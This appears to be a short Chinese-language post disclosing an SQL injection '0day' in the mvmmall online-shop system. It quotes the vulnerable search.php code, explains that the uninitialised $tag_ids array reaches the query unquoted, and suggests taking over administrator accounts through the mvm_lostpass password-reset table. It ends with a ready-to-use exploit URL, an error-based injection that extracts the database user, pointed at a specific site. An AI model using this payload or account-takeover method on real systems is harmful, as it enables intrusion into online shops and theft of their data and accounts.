mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上。
代码如下:
<?php require_once ‘include/common.inc.php’; require_once ROOTPATH.’header.php’; if($action!=’search’){ $search_key = ”; if (isset($ps_search)) { //省略一堆东西 $tag_ids = array(); //在if里 //继续省略 while ($row = $db->fetch_array($result)) { $tag_ids[] = $row['goods_id']; } //也是在if里 } //省略一堆东西 } //结束if里的东西 //商品标签搜索 $tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入 $tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会 $tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了! //省略无关东西 $search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的…. $total_count = $db->counter($mvm_goods_table,$search_sql);
用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了。
测试EXP:
http://www.heimian.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23 |